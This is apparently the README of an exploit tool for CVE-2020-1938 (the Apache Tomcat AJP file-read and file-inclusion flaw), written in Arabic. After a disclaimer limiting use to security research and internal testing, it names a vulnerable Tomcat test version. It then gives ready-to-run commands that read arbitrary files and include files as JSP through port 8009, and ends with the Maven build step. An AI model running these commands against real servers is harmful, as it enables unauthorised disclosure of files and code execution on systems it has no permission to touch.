
CVE-2020-1938
الأداة مخصصة للبحث الأمني والفحص الداخلي فقط، يُمنع استخدامها لشن هجمات غير قانونية، والمستخدم يتحمل المسؤولية عن العواقب

apache-tomcat-8.5.32.zip لاختبار tomcat
قراءة ملف عشوائي
java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 file /index.jsp
تضمين ملف
java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 jsp /index.jsp
طريقة التجميع: في الدليل tomcat/ajp-bug نفّذ mvn clean compile assembly:assembly